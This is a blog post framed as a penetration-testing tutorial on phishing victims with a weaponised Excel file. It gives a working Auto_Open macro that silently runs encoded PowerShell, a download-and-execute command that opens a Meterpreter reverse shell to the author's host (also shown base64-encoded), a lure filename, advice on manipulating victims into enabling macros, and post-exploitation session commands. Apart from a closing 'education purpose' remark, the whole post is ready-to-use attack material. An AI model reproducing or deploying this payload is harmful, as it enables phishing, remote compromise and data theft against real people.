i Penetration Testing – Excel – The Old Trick – All things in moderation

# Penetration Testing – Excel – The Old Trick

After the previous post, I think you guys have tried some tricks with Social Engineering Toolkit ( SET ). Believe me, this tool is worth to try. Today, I will show you my old trick that related to Social Engineering. Sometimes when you get in the victim’s network, you can’t use ARP Poisoning, I mean Web Based Attacks. At this point, you guys should try to inject some payloads into some documents and send it via a fake company mail. For example, I use Excel Macro. You guys could follow my quick tutorial to get a whole point of it.

• Firstly, you guys open Excel then put here some funny information like this:

• Secondly, you create a macro named Auto_Open() like this:
Sub Auto_Open()
Sheets("Sheet2").Visible = True
Sheets("Sheet2").Select
Dim strCommand As String
strCommand = "PowerShell.exe -Exec Bypass -NoL -Win Hidden -Enc [Base64Code]"
Shell strCommand, 0
End Sub


Do you still remember how do I create a meterpreter that connect back to my host ( If you guys forgot it, you can review it by this post.
If you guys remember it, you could just encrypt this code by base64 encode:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/12ce71b9f4b0428d9425e001e5988f91eb2b8b87/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.10.138 -Lport 443 -Force


And your base64 encode is here:

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AUABvAHcAZQByAFMAaABlAGwAbABNAGEAZgBpAGEALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwAxADIAYwBlADcAMQBiADkAZgA0AGIAMAA0ADIAOABkADkANAAyADUAZQAwADAAMQBlADUAOQA4ADgAZgA5ADEAZQBiADIAYgA4AGIAOAA3AC8AQwBvAGQAZQBFAHgAZQBjAHUAdABpAG8AbgAvAEkAbgB2AG8AawBlAC0ALQBTAGgAZQBsAGwAYwBvAGQAZQAuAHAAcwAxACcAKQA7ACAASQBuAHYAbwBrAGUALQBTAGgAZQBsAGwAYwBvAGQAZQAgAC0AUABhAHkAbABvAGEAZAAgAHcAaQBuAGQAbwB3AHMALwBtAGUAdABlAHIAcAByAGUAdABlAHIALwByAGUAdgBlAHIAcwBlAF8AaAB0AHQAcABzACAALQBMAGgAbwBzAHQAIAAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAzADgAIAAtAEwAcABvAHIAdAAgADQANAAzACAALQBGAG8AcgBjAGUACgA=


You just put in it the [Base64Code] above and then you have just finished your macro. Then save your file as this name: Hotgirl_Telephone.xls.
You know what I mean. 😀

• You send this excel via a mail attachment. But it has a drawback. You guys can see it here.

You guys need to use your social engineering to force the victim enable this macro feature.

• After this part, everything is done. When we turn on our Listener to listen at port 443

the victim will connect back to our host

We use this command to start interact with our session:

sessions -i 1

And show their drives:

show_mount

List all the files in this drive

ls

Or their current running processes

ps

Because I used to use Windows command lines, so I use this command to change mode.

execute -f cmd.exe -i -H

And then you guys could list their files by dir command

dir

You could write a note.txt file for test ( You know what I mean here ? 😉 )

echo recovery sky > note.txt

Check it appear

dir

View its content

type note.txt

Then delete it.

del /q /f note.txt

Finally, if you want to exit this mode, type exit

exit

And run this session in background

background

To select another session in your list

Personally, I think it is enough for you guys to test the victim computer, but always keep in mind, we do this with education purpose. 😀